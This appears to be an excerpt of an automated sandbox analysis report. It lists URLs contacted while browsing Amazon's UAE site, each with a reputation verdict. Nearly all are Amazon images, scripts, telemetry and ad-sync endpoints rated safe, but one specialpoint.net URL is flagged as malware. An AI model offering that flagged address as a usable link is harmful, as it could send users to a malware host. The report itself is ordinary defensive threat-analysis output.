                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/I/813rUU6R6uL._AC_UL225_SR225,160_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://www.facebook.com/fr/r.php?p=558293300959460&e=NMc_00QDRY2_1zWXHDYw0g&r=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dfbca%26id%3DNMc_00QDRY2_1zWXHDYw0g&s=1723469050&h=ZkZ2TFNLQWpzOHlRK2o3NWybuaMasXff9ycQxOAr7N9KYHfffalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://cm.g.doubleclick.net/pixel?google_nid=a9eu&google_cm=&ex=doubleclick.net&gdpr_consent=&google_tc=false
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763848_372x232_2X_en_AE._SY116_CB558609315_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/I/015J73ZDjpL.js?xcpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://m.media-amazon.com/images/I/718G151Go9L._AC_SY200_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1740513_3911856_186x116_1X_en_AE._SY116_CB566464918_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://m.media-amazon.com/images/I/61OaibCCrKL._AC_SY200_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D2554%26pc%3D16655%26at%3D16655%26t%3D1723469060977%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:16655false
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:2T6Z4AC3VMBGX01C1EVN$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D2T6Z4AC3VMBGX01C1EVN%26m%3D1%26sc%3Dcsa%3Asi%26si%3D3567%26pc%3D7461%26at%3D7461%26t%3D1723469074827%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D2T6Z4AC3VMBGX01C1EVN%26aftb%3D1%26lob%3D0:7461false
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26ctb%3D1%26sc0%3DjQueryWindowLoad%26cf0%3D16617%26pc0%3D16617%26ld0%3D16617%26t0%3D1723469060939%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:16617false
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D2078%26pc%3D16650%26at%3D16650%26t%3D1723469060972%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:16650false
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/G/01/msa/vowels/metrics.jpg?time=1723469098777&rand=346422false
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/I/81ZqHezuUOL._AC_UL450_SR450,320_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/I/61P62lC5OHL._AC_UL225_SR225,160_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/I/617GtbtSffL._AC_UL450_SR450,320_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://m.media-amazon.com/images/I/31+4pNVeyCL._SR480,440_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/I/11Hy-4jiUaL.css?xcpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://cookie-matching.mediarithmics.com/input?key=GOO&key=GOO&action=GET_ID&opid=goo&etid=&domid=1106&ops=apx&google_gid=CAESEHd7TnmxVBefiCYYRMqSbzw&google_cver=1false
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://www.amazon.ae/rd/uedata?rid=99EW8DTCPK04PDBCDQEK&sid=262-5692979-3003613&rx=zeSr6zbHsQh3b0mOv5A96gfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/G/39/Associates/XCM_Manual_Coupons_DQC_44b7c125-ee97-441e-9257-50452eb12b8c._SY116_CB613590867_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://m.media-amazon.com/images/I/31Id2i6D-rL._SR240,220_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26m%3D1%26sc%3Dcsa%3AbrowserQuiteFn%26pc%3D16604%26at%3D16604%26t%3D1723469060926%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-06%7CmutObsYes%7Cnavbar%7CgwCFImgNoCache%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7Cadblk_no%7CperfYes%7Ccf_cdn_fr%7Ccf_cdn_mp%7CmutObsActive%7Caui%3Acss%3Anetwork%7Caui%3Ajs%3Acache%7CfourColumn%7CthreeColumnRevised%7CflexLayout%7CcssGridLayout%7Cadrender%3Ab73e766d-3a78-4209-bde9-93efa566562d%7Cadrender%3AGateway%3Aright-7%3Adesktop%7Cadrender%3Asafeframe%3Ab73e766d-3a78-4209-bde9-93efa566562d%7Cadrender%3Asafeframe%3AGateway%3Aright-7%3Adesktop%7Cadrender%3Ab73e766d-3a78-4209-bde9-93efa566562d%3Acreativetemplatename%3Aimage%7Cadrender%3AGateway%3Aright-7%3Adesktop%3Acreativetemplatename%3Aimage%7Cadrender%3Ab73e766d-3a78-4209-bde9-93efa566562d%3Acreativeid%3A579371395698106697%7Cadrender%3AGateway%3Aright-7%3Adesktop%3Acreativeid%3A579371395698106697%7Cadrender%3Ab73e766d-3a78-4209-bde9-93efa566562d%3Aprogramid%3A1001%7Cadrender%3AGateway%3Aright-7%3Adesktop%3Aprogramid%3A1001%7Ccsm-feature-touch-enabled%3Afalse%7Caui%3Asw%3Apage_proxy%3Arequest_feature_tags%3Atimed_out%7CbrowserQuiteFn%26viz%3Dvisible%3A11%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:16604false
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/I/51B00IVUMIL._AC_UL450_SR450,320_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/I/01DM-rg61+L.js?AUIClients/F3CollapsedCartAssetsfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D776%26pc%3D27642%26at%3D27642%26t%3D1723469122091%26pty%3Dzeitgeist%26spty%3Dbs%26pti%3Dundefined%26tid%3D6NXZ98JFWKRECR4538X7%26aftb%3D1%26lob%3D1:27642false
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986225_UAE_Budget_Store_AE_xsite_home_en_400x400_2X._CB644457597_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcar_b07pcm7ds2_379x304_ae-en._SY116_CB623005780_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://aax-eu.amazon.ae/e/xsp/imp?b=RLIYXr6sK-Tdry028JK9OgsAAAGRRsH9MgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICCq3cNZ&pj=%7B%22measurementMethod%22%3A%22btr_client%22%7Dfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_TVs_1x._SY116_CB659040198_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745525_372x232_2X_en_AE._SY116_CB558011712_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://m.media-amazon.com/images/I/61czlYZjf2L._AC_SY200_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/I/61NFkX7td8L._AC_UL225_SR225,160_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://specialpoint.net/cdn-cgi/challenge-platform/h/g/jsd/r/8b20c7739b2319b2true
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://m.media-amazon.com/images/I/61m4NR7APqL._AC_SY200_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://m.media-amazon.com/images/I/51YnNha37vL._SX1500_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://cm.g.doubleclick.net/pixel?google_nid=a9eu&google_hm=hNTQsyYhS2GGOCcWs3wFCQ&false
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://m.media-amazon.com/images/I/71hpd10GGkL._SX3000_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Wearables/Feb_Under199_1x._SY116_CB659039825_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3D6NXZ98JFWKRECR4538X7%26ue%3D7%26bb%3D102%26ns%3D137%26ne%3D227%26be%3D629%26fp%3D198%26fcp%3D198%26pc%3D24797%26tc%3D-1555%26na_%3D-1555%26ul_%3D-1723469094449%26_ul%3D-1723469094449%26rd_%3D-1723469094449%26_rd%3D-1723469094449%26fe_%3D-1551%26lk_%3D-1502%26_lk%3D-1502%26co_%3D-1502%26_co%3D-760%26sc_%3D-1488%26rq_%3D-760%26rs_%3D-43%26_rs%3D466%26dl_%3D-33%26di_%3D656%26de_%3D657%26_de%3D701%26_dc%3D24796%26ld_%3D24797%26_ld%3D-1723469094449%26ntd%3D0%26ty%3D0%26rc%3D0%26hob%3D5%26hoe%3D7%26ld%3D24798%26t%3D1723469119247%26ctb%3D1%26rt%3D__ld%3A92-9-2-75-7-6-1%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-06%7CmutObsYes%7Cewc%3Aunpersist%7Cewc%3Aunpersist%3Aemptycart%7Cewc%3Abview%7Cewc%7Cewc%3Aunrec%7Cewc%3Acartsize%3A0%7Cewc%3Aaui%7Cnavbar%7Caui%3Acss%3Acache%7Caui%3Ajs%3Acache%7CmutObsActive%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7Cadblk_no%7CperfYes%7Cfy_cdn_fr%7Cfy_cdn_mp%7Ccsm-feature-touch-enabled%3Afalse%7Caui%3Asw%3Apage_proxy%3Arequest_feature_tags%3Atimed_out%26viz%3Dvisible%3A6%26pty%3Dzeitgeist%26spty%3Dbs%26pti%3Dundefined%26tid%3D6NXZ98JFWKRECR4538X7%26aftb%3D1%26lob%3D1:24800false
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332325_186x116_1X_en_AE._SY116_CB597933578_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D2669%26pc%3D27642%26at%3D27642%26t%3D1723469122091%26pty%3Dzeitgeist%26spty%3Dbs%26pti%3Dundefined%26tid%3D6NXZ98JFWKRECR4538X7%26aftb%3D1%26lob%3D1:27642false
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://m.media-amazon.com/images/I/31AGMSYB+OL._SR480,440_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://m.media-amazon.com/images/I/51Q42KWVMgL._SR480,440_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://m.media-amazon.com/images/I/71YJXiyG3LL._AC_SY200_.jpgfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://aax-eu.amazon-adsystem.com/s/iu3?d=amazon.ae&slot=navFooter&a2=01018163eecaf7712c47f919b4fe519c2bd46c2dc95cd92eeb2825c833cd7da6a768&old_oo=0&ts=1723469065093&s=AUOTRAS__0F95ZW7sKRiRO2haG2dGQwv0-iRzssbvEeJ&gdpr_consent=&gdpr_consent_avl=&cb=1723469065093false
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://images-eu.ssl-images-amazon.com/images/I/81LPwvQLXJL._AC_UL225_SR225,160_.jpgfalse
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fld%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26sw%3D1280%26sh%3D1024%26vw%3D1280%26vh%3D907%26m%3D1%26sc%3DPAGVV1BKBQP3X0S0NFTP%26ue%3D1%26bb%3D55%26cf%3D159%26be%3D166%26fp%3D130%26fcp%3D130%26pc%3D382%26tc%3D-1095%26na_%3D-1095%26ul_%3D-1723469074018%26_ul%3D-1723469074018%26rd_%3D-1092%26_rd%3D-566%26fe_%3D-566%26lk_%3D-563%26_lk%3D-563%26co_%3D-563%26_co%3D-326%26sc_%3D-563%26rq_%3D-326%26rs_%3D-40%26_rs%3D146%26dl_%3D-36%26di_%3D255%26de_%3D256%26_de%3D259%26_dc%3D380%26ld_%3D381%26_ld%3D-1723469074018%26ntd%3D-1%26ty%3D0%26rc%3D1%26hob%3D1%26hoe%3D1%26ld%3D382%26t%3D1723469074400%26ctb%3D1%26rt%3Dcf%3A13-10-3-0-2-1-1__ld%3A14-11-3-0-2-1-0%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-09%7CmutObsYes%7Cfls-eu-amazon-com%7Cadblk_no%7CperfYes%7CmutObsActive%26viz%3Dvisible%3A1%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:384false
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://m.media-amazon.com/images/I/713WPUEZYDL._AC_SY200_.jpgfalse
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://x.bidswitch.net/sync_a9/val=G0hb0S_9R-uF3jeZDvl1pA&redirect=https://aax-eu.amazon-adsystem.com/s/ecm3?ex=bidswitch.com&id=${UUID}&gdpr_consent=false
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://m.media-amazon.com/images/I/61oyKtHlCaL._AC_SY200_.jpgfalse
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D27641%26at%3D27641%26t%3D1723469122090%26csmtags%3DstartVL%26pty%3Dzeitgeist%26spty%3Dbs%26pti%3Dundefined%26tid%3D6NXZ98JFWKRECR4538X7%26aftb%3D1%26lob%3D1:27641false
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://m.media-amazon.com/images/I/41Zp3xaXvPL._SR240,220_.jpgfalse
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://images-eu.ssl-images-amazon.com/images/I/51NCX6DSjPL._AC_UL225_SR225,160_.jpgfalse
                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://aax-eu.amazon-adsystem.com/s/v3/pr?exlist=n-xr-HMT_n-id-HMT_n-audex_n-weborama-pca_n-eq-HMT3_n-ix-HMT_bk_n-y-HMT_n-cx-HMT_n-telaria_n-dm2-HMT_fw_n-fo-HMT_n-kr-new_n-bsw-hmt_n-st-HMT1_n-rb-HMT3_n-fw-HMT1_adb_mp_af_n-sk_n-mediarithmics_g_kr_n-lm-HMT3_ox_index_n-tl-HMT_n-semasio-ecm_n-kg-HMT_n-gg-HMT2_an_n-pm-HMT_rb_n-g-hmt_nsln_fbca_n-ym-HMT_n-sc_pm_n-ox-hmt&fv=1.0&ex-pl-fbca=NMc_00QDRY2_1zWXHDYw0g&a=cm&ex-pl-n-kr-new=Naup9umsR8qjcTxFb2ilkg&dmt=1&gdpr_consent=&ex-pl-n-g-hmt=hNTQsyYhS2GGOCcWs3wFCQ&ep=ttam_T219Ay-cPciHbT10nY7Fvbd7iRSpweloqqrJ5pKjcecjBSqbIO9gzY5fZpHW8FVTwAAZTi1FVgAtX8mi3nR_PdVDtHSGTSx896mryq-SdvK8-23WpndIQOIc6JjBzdjSE5yekL8GojgigfQVBTDAt2gU10hYafvg5LOW0CYxHZVakUCPH5iw6dDpEiI9r8Ybj8gK-isRTP44N849cuByCLDpmaA5Rdjmd4H8LICNSzRnWwGC0Z_OU9l81RspLixN_9UCB-Smol5hFXH5SaiIrLKkbD_UPc6KDfeOtBulbOKp3i82M4Rav0mxm8NSL1beSmHspDyDDgmtM_Dn4loVVSbn2tIMnwbHXgNepydfAEt0hqR_u281JN4F1MhoVNG8WC_EHZMxdfifQVJtZvIJGchDMpyUUGsf_9zUrH3SyS4PSGagUack0siuW6ab_qsSaJ2S5kaK_w-E8T8YmnxN_Sf-iv6Qern5EpqRX9siMCQk1vGX2OJfD-WLirBkSQPrhY3CcS0VTrhn_HkfG-QL41BGfX-LmyYbBl4XQtTQ8-NEgqOG4khSFxIn9EmNzs1r2R3VuwoeuxRCLHlsgNIDQXACIrC1HCpYnG70vBtpI6QSi7cctvdXgCT32M4AYQyulqHiOeOpOe9q_TqzWR4m9XwztZUud5p6rGR3U5eOIjyMV2sGdLwaxC5XNMzXoUE0j_ukHALKmgU6QBOYByDNDuoH0_N-Dh-y0Hum8e6P26ldA5XajePx8SkRAXtjX7mAFoZCpbtDj_145tMg7INIrVIfdFXcBEQjeCLtn35c69rfIgC6o8iJ24bQcCb3eP__COvgYoGTI_rKdZyqJQPhqutkWf1IXjhK53UEnTnE6coXjL3WssLOcGD4X85rt43otV6qFS9XV03bLjwYREtB9vL0PkJzsJYX9zYXa8UZjLLsqqJxetijkPHI8jCjp72RBW_JHLHN7rqCEIFSWafSSHx_L0MlFQagSL5qiNzNy-53mNqwaYfc8YmMSUpQTMvSlostBAtA5i5drpLktKnGiJx8YrUZXeHXBrAtLfldiCSrc5FjPKpx4gaUI1-5fvvqKlVjaKIYN1833TwUo6tAH8lg7ZlwbbPGo8RFYuC8zRbaUdmb_hfwKuRIXELYwJzDmdTXfb2tnzwGGpRvAfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D267%26pc%3D397%26at%3D397%26t%3D1723469074415%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:398false
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://images-eu.ssl-images-amazon.com/images/I/A1fXNtoo+RL.js?AUIClients/ACICAssetsfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://m.media-amazon.com/images/I/41E6wo15qgL._SR240,220_.jpgfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.net/test.pngfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://m.media-amazon.com/images/I/71c2DCsZCJS._AC_SY200_.jpgfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200.jpgfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://csync.loopme.me/?partner_id=1392&uid=CzBuKoKbRHuwfuuPL_fVTw&gdpr_consent=false
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:P3EBDX30THKD0V702NQB$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DP3EBDX30THKD0V702NQB%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D6494%26pc%3D7585%26at%3D7585%26t%3D1723469085491%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DP3EBDX30THKD0V702NQB%26aftb%3D1%26lob%3D1:7584false
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://rd.frontend.weborama.fr/rd?url=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dweborama%26id%3D%7BWEBO_ENC_CID%7Dfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://images-eu.ssl-images-amazon.com/images/I/71dwE8Ob46L._AC_UL450_SR450,320_.jpgfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259737_400x400_2X._CB617696541_.jpgfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                    http://tools.ietf.org/html/rfc2397chromecache_992.8.dr, chromecache_873.8.drfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://www.opensource.org/licenses/mit-license.phpchromecache_992.8.drfalse
                                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://www.amazon.inchromecache_1202.8.drfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://unagi-na.amazon.com/1/events/com.amazon.csm.nexusclient.gammachromecache_1300.8.dr, chromecache_992.8.dr, chromecache_873.8.drfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://www.amazon.itchromecache_1202.8.drfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://github.com/mozilla/source-map/issues/30chromecache_992.8.dr, chromecache_873.8.drfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://issues.amazon.com/issues/KAT-1534)chromecache_992.8.dr, chromecache_873.8.drfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
